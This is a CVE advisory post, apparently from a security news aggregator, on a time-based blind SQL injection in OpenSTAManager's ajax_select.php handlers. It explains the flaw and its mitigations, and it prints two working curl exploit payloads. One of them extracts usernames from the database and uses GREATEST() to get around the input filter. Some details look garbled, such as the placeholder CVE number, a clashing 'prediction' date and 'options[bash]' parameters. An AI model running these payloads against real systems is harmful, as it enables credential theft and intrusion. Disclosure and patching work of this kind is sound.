OpenSTAManager, Time-Based Blind SQL Injection, CVE-2025-XXXXX (High)

Listen to this Post

How the mentioned CVE works

The vulnerability exists in multiple AJAX select handlers due to unsafe concatenation of the `options

` GET parameter directly into SQL WHERE clauses. The `ajax_select.php` endpoint reads this parameter and passes it through <code>HTMLPurifier</code>, which only strips HTML tags and the `>` character but leaves SQL keywords (<code>SELECT</code>, <code>SLEEP</code>, <code>IF</code>, <code>UNION</code>) and operators (<code>=</code>, <code>(</code>, <code>)</code>) intact. The sanitized value is then assigned to `$superselect['stato']` and included in module-specific `select.php` files. In <code>preventivi/ajax/select.php</code>, the value is concatenated as <code>($stato = 1)</code>, allowing an attacker to break out of the expression. In <code>ordini/ajax/select.php</code>, it is inserted as a column name: <code>`or_statiordine`.$stato = 1</code>. In <code>contratti/ajax/select.php</code>, it is placed inside a subquery: <code>WHERE $stato = 1</code>. Because the input is not validated against an allowlist and is not parameterized, an authenticated attacker can inject time-based payloads like `1)+AND+(SELECT+SLEEP(10))-- -` to cause delays, extract database contents, or modify data via subqueries. HTMLPurifier’s stripping of `>` is bypassed using the `GREATEST()` function. The injection is blind, with results inferred from response timing differences.
Platform: OpenSTAManager
Version: 2.10.1
Vulnerability : Time-Based Blind SQLi
Severity: High
date: 2026-04-01

<h2 style="color: blue;">Prediction: 2025-05-15</h2>

<h2 style="color: blue;">What Undercode Say:</h2>

[bash]
Time-based injection test for Preventivi module
curl -k -X GET "https://target.com/ajax_select.php?op=preventivi&options[bash]=1&options[bash]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)+AND+(1" -b "PHPSESSID=<session>"
-- Vulnerable code snippet (modules/preventivi/ajax/select.php lines 59-60)
$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';
$where[] = '('.$stato.' = 1)';

Exploit:

Extract first username character using time-based inference with GREATEST()
curl -k -X GET "https://target.com/ajax_select.php?op=preventivi&options[bash]=1&options[bash]=1)+AND+(SELECT+1+FROM+(SELECT(IF((GREATEST(ASCII(SUBSTRING((SELECT+username+FROM+zz_users+LIMIT+0,1),1,1)),97)=ASCII(SUBSTRING((SELECT+username+FROM+zz_users+LIMIT+0,1),1,1))),SLEEP(5),0)))a)+AND+(1" -b "PHPSESSID=<session>"

Protection from this CVE

1. Apply allowlist validation for `stato` parameter.

2. Use regex `preg_match(‘/^[a-z_]+$/i’, $stato)` to restrict input.

3. Wrap column identifiers in backticks after sanitization.

Impact

  • Confidentiality: Full database extraction including credentials.
  • Integrity: Potential data modification via injected subqueries.
  • Availability: Denial of service via long `SLEEP()` or heavy queries.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top